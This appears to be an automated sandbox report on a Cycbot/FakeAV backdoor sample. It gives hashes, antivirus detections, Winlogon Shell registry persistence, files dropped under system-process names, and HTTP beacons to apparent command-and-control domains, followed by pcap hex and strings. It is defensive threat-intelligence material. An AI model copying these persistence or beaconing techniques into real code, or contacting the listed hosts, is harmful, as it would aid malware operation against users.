Analysis Date2015-01-15 13:47:28
MD5fccde3f34c18bb86a0c299d8ddd53a61
SHA124ec1a86cc302afca67967bfc125923322edc5fe

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 315f00ebed2aee8b4a9c2bf5a16b3650 sha1: b0b04e06f6306b24309fe393f4694a523e88bcf7 size: 110080
Section.tls md5: 01727e1ba6688dc18254e9f60f68f5d2 sha1: 6a20a07fc302b5823d0715d58a22b32b9763f476 size: 1024
Section.data md5: e3ab8a82d23e74c2ce3bfb868b506fa9 sha1: 3df43e4073bbf9d825eb2c12a91b12267ef100d9 size: 70656
Section.reloc md5: a0f6fca3855ba1f80207be83aa7fd0c0 sha1: 79b917e1c928330f2fe601f9fb46021dfe336e18 size: 1024
Timestamp2005-11-09 23:59:43
PEhashc29cdfce897ead2d875a98107930d82a3639afd2
IMPhashf789931b2b97f41e9be6e08058fda06e
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.36193
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.36193
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.36193
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-5427
AVDr. WebTrojan.DownLoader1.64291
AVEmsisoftGen:Variant.Kazy.36193
AVEset (nod32)Win32/Kryptik.SMY
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Variant.Kazy.36193
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.36193
AVRisingTrojan.Win32.Generic.1294D424
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen5
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSwwwmediaportal.com
Winsock DNS127.0.0.1
Winsock DNSrealsoftwaredevelopment.com
Winsock DNScoolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSrealsoftwaredevelopment.com
Type: A
104.28.8.83
DNSrealsoftwaredevelopment.com
Type: A
104.28.9.83
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSwwwmediaportal.com
Type: A
128.199.187.239
DNScoolmediaportal.com
Type: A
HTTP GEThttp://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v29=97&tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GEThttp://wwwmediaportal.com/blog/images/3521.jpg?v9=33&tq=gKZEtzyMv5rJqxG1J42pzMffBvEp1ujbwvgS917V65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 104.28.8.83:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 128.199.187.239:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 32393d39   humb_1.gif?v29=9
0x00000030 (00048)   37267471 3d67485a 75744479 4d763572   7&tq=gHZutDyMv5r
0x00000040 (00064)   4a656a44 6961396e 726d736c 36676957   JejDia9nrmsl6giW
0x00000050 (00080)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   20726561 6c736f66 74776172 65646576    realsoftwaredev
0x00000090 (00144)   656c6f70 6d656e74 2e636f6d 0d0a4163   elopment.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7639 3d333326   /3521.jpg?v9=33&
0x00000020 (00032)   74713d67 4b5a4574 7a794d76 35724a71   tq=gKZEtzyMv5rJq
0x00000030 (00048)   7847314a 3432707a 4d666642 76457031   xG1J42pzMffBvEp1
0x00000040 (00064)   756a6277 76675339 31375636 35724a71   ujbwvgS917V65rJq
0x00000050 (00080)   6c4c6667 50695757 31636720 48545450   lLfgPiWW1cg HTTP
0x00000060 (00096)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000070 (00112)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x00000080 (00128)   77776d65 64696170 6f727461 6c2e636f   wwmediaportal.co
0x00000090 (00144)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000a0 (00160)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000b0 (00176)   6c6c612f 322e300d 0a0d0a6d 65210a20   lla/2.0....me!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
1
.W.m.W.
...
(
r
.
.
...2.~j
.BL.
>.m

080904b0
1.0.0.1
1532
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
^^^^^^
~~~~~~
~~~~~~~~~~~
~~~~~~~~########
======
=========
================
====$$$$$
>>>>>>
>>>>>>>
>>>>>>>>>))
>>"%;,
||||||
 `,@`$
____________
,,,,,,
;;;;;;;
;;;;;;;;;;;;
;;;;;;;;;;;;;;
:::::::
!!!!!!!!!!!!!
/^^^^^^
//////
'''''''''''
'''']]]]
'''%%%%%%
""""""
"""%%%
(((((((((((((((
)))))))
))))))))
[[[[[[
]]]][[[[[[[[[
]]]]]]
{{{{{{
*`@$@ 
********
**********
\\\\\\\
&~~~~~~
#########
%%""""""
+++++++
+++++++++++
																
`````0
000000
00000000000000000000
?0*}~6]
<0pzer
0Wy@|*
11....
#%11111
]1 `@Q
2}}}}}}}}}}}}}>>
|||||||||||222222/
22222221
[22222222222222888
2+++++JD
/2UT)A
:3*1x-
333HHHH[
36, @Mh
`:|4&@`}\.``
444444
444444														
4444444444444
4F}u=~g
4K	0H-
4p6H3|9
4Y7assk
5bbbbbb
5bOLuk
 5&  FI! 
5,J%3o
%@5O\X{
5w9AeTy
5/.^:w}F<
66666,,,,,,,,
66666644
666666666
666kkkkkkkkkkk
69#+w+
_6b* @
	6buS#
6(IRVU
6:;K o
6V+zZiX
6Z"G:E
& `')7
=777<<<<<<___
77777777
7777777777
7%bzLy
7$cStR
/7.` DX
7gCt#.
7;lKIx
@7oU	t
|7x'' 
888866666
@@@@@@@@@@@@8888888
88888888888888
888888888888VV
&  8)AmXh
$8f!Th
&&|8gQ
8p(Kk(
8X*` ?X,
 944A"
@@97gd=
99999jmmmmm
=9LbZ9z
9S7s,@ E
'a1a}y
aaaa\\\\\\\\
AAAAAAAllllllllllllllllllll
aaaaaennnnnn
aa[[*******g
[ADaP~
ADVAPI32.dll
AHUEnQ
-AHWl~
@]a'Jf
aJrXv6#
aP+&@ 
,aPien
b??????___
B2%s2,  
BBBBB$$$
@@@@@@@@@@bbbbbbbbb
bbbbbbJJJJJJJJJ]]]]]BB
'@BBY MC
^^^^^^bccccccc
BCE^(~
b(  E1
b%F/+9
`@-BGP
BL$` )U
BtXGE!
B@W!Xx6
C/14gz-!
c4B>mH
@C{AP3
CC>>>222JJJ
ccccc((
ccccccc
ccccccccccccccc@@@@@@:::::PP
))cEEEEEEAA
Ch.dll
cH|.`@xQYx
C~KEgo+
cn*l}&
CoTaskMemFree
CreateProcessA
CreateStdAccessibleObject
C+wIG[
`C|WM82
D[8`t%l
@.data
+DB0}(
dddddd
ddddddddddddiiii111
((dddddddddddGGGGGGG
}}}}}}}}}DDDDL
DDDDxPP?
DDDPPPYYYYiii
ddiiiiiiiiiiiiXX{{{
D,[|)h
''''dMMMM
DNNbbb
	+\*D,#t=
|DTbxV
E7a'C{
e8+NRT1
%%/\E);9
e9X(g;41
E_<AHAq
EbCaiW
::::EE
eeeeee
eeeeeee
eeeeeeeee
EEEE+SSSSSS
EEtttttt
[EI*(DQ
Ej~i+a
e!mo,G^
EnumResourceNamesA
'Et*'2
eu]t{v<[Z
<E]vb{
@E[y  `
`!!!!!!f
''''''''f
%%%%f||||||===
+++++f
F0}"})p
F9LZ\*3J
]]]]FF
FFFFFA
?ffL7-`
f_"i8!hj
Fx6G"c
.  )Fy
*` f;Z
 G`323
G*4Amxv
G9GdUV(
 G^]D)
GetSystemTimeAsFileTime
++ggg{1111
%%%%%%GGGG===
	GGGGGG
GGGGGGG
GGGGGGG}}}}
GGGGGGR7
GGGMMMMMr
GGttttttttt```oooooo
g_k, `c
`GRzey
<g|ScQ
&` g;W
gX<r;V@
Gy`$lTP
h[00:|,
 H0	u& 
*h2H>_
HBa1h5
hB!L8R
hhhhhh
HHHHHH
HHHHHoooooooooooo
HHHppp
& `hRk$
$h<tR1LD
`HuLpl
hv$ `}
h;x-4V
IaKPiYOa`
I:b47}
@ I:]E
iii&&&&&&&&6666
iiiiEEEEEEEEEEEE
}IIIIIIIII888
i{N}$``
InterlockedExchange
*<Iug_
IuIF$@
IX'g86
Iy_(15!
	'~J/8YdK
jhV|EJ
jjjj%%%%%%%%%%%%%
jjjjjjjjj
]]]]]]]jjjjjjjjj
))))jjjjjjVVVV
JJJJJW
JJJJPPPP
Jk- `.
,^Jw(es
jZ>Skh
{K[28i
?k8ztf"
k~/B;& 
K|cGw]}n
KERNEL32.dll
kja[/oTW
$$							kkkkjjjjj
kkkkkk
kkkkkkk
KKKKKKKggOOO
kkkkkkkkkk
KKKKKKKKKKKKKKKKKQQQQ
KKKKK>>>ooooooo!!!H
KKUUUhhppSSSSStttttttttt(((((
kmSH8F
,Kq[y=
KsI"` C
KT[-#vZ/H
}Ku{0,  
K@|X/5
(($$$$$$$$$$$$l
L?bJ1jNDX
lCLY7;
LhbV4~
lH(U	>~!
@l(`@JP
lkz0![P
lllllll
LLLLLLLL
lllllllllllllllllY
LocalAlloc
LresultFromObject
lstrlenA
{l	V{~
]LW%JY
)=M>$ `
MMMMMM'''>~
mmmmmmm++
MMMMMMMMMMM
mUE"`@
MultiByteToWideChar
`@MU>Z
(@`m)w
|#n-3%
 @N	5Cji
NBkyv0
nIS^&@
}NL0x1] 
;;;;nn
//nnn11@@@@@oooo6
nnnnnn
%%%NNNNNNNNN
nnnnnnnnnn       
<<<<<<<<<<NNNNNNNNNN
[[[[[nnnnnvvvvrr
nOpS{P-
Nw|17i\&
o~*@`"``
/\#|O^
$'{]O7
-oa%p;v$e
@ %o\E
OLEACC.dll
oLOqGg&
ooo...
OOOOO8888888888
OpenMutexW
O!P?@m
.os\Xt
ovvvvvvvvvvvvvv
///////////P
P* `	$
@@p>2b
p`3Nb[
 ``P4	
pe.@ >
PeIdj%
PPPP0000
pppppp
pppppp***
PPPPPPbbbbbbbbb
PPPPPPPPPPPcccccccc
pppppppppppppppppppp
PPPPPPPPqq
]PQ"i:z
ProgIDFromCLSID
\p%* T
pvSw8/5
qa% ~]
!Q:A+P
	QhmQ!K
				QQ888rrG
QQ,,,d
qqdddddddddddd
qqq88888
QQQQQQ
qqqqqqqq
QQQQQQQQQQ
qqqqqqttttt
}qRx?I
^|?qsA
Qu[^}$
,/QuUUz13
Q,`@'z
QzrEj%
[&@ /@r
+<)R?\
RaiseException
rA{%Ox|
R,@ aw<
R=[C+E
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
rggggggggggg
=rG}hES
..RRRR
rrrrrr
rrrrrrrrr
`	'-{s
=s0lP2
" `s3"
,` `S4R
s%,7fa
S;aB'.P
@saZa6
SHELL32.dll
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
sjF?`F
S]m4zt
~SQKYM
ss~,  
SSSS~~\\
ssssss
SSSSSS
SSSSSSS
SSSSSSSSSS
SSSSSSSSSSSS
SSSSSSSSSSSSS
SSSSSSSSU
StringFromCLSID
StringFromIID
s=Vlae" 
  ^]t!
 T0/TIdML
t0zoCa
t5_m.``
(T5uE+
!This program cannot be run in DOS mode.
tJHypLH
T>JU[j
t>K{[o|
t#nA/q
tNe}ntS
}TN |yiT
@tPY7x
t'.` s
::::::::::::tt
T&TF=S
ttjjj\\\
!!!TTT
tttt88888
tttttt
Tv4+ @
.` U)	
U====================
u6!{zU
UE6C6ET ``
@u-JvM
u @ k9g
UM,jabMD
u& `n5
(u/[Us
//{UUUll
uuuuuu,,,,,,,,
				UUUUUUUPPPP00000000000000
UUUUUUUU
UUUUUUUUUUUU
UUUUUUUUUUUULL
UUUUUUUUUUUUUU
||uuxx
	v{#,{
VAAAAA
		vD$`
VirtualQueryEx
`VM@m>
v+pPo6
VU;}w\
VVVVVV
w/"  .`
` W0)P
W3MIn07
;w`4F'
W6L&X]?
;WBjX+,` c
w.``Hf
WideCharToMultiByte
}}w!?!>k
Woo:zd
w>psvR#
ww%%%%%%\\hjj2U
wwwwjjj
W""""""wwww!!!!!
))))WWWWWWW
//////x
x37Pa"
XA?2rV
XeO^'j
xioQW0
,XJZ9&
X#n$Vk
xP6\	\
 `xpEG
XQ+lJ.">
Xtl_\b
\\\\\\\XX
~~~xxx
XXX<<<<
XXX222mmmmm
xxxxxx
XXXXXXXXf
xYJ*@ 
YE&` o"@
	yF'RT
YFwSBd
@|yg@X2K#|
 `yh2w
Y<HHHHHHHH
YI.........
y?!wUIt
yxr3\xO
YYJJJJJ
YYY,,,,
(((YYYY&&&,^^
yyyyyyyyyy
_Z, `-/
Z4fn;1-}V
^ZDDDDDDD
zDDDDDDD					l
z?#LpE
zNJD{'
@@z;qr
z]QyS3}
ZvvZ[|
zz{JJ[[["""""""""""
>>>>>>zzzmmmmmmmmmmmmmmmmm`<<<~~~~~~~
zzzzAAA
zzzzzzBBBBBBBBBBDDDDS
ZZZZZZZZ++++++++++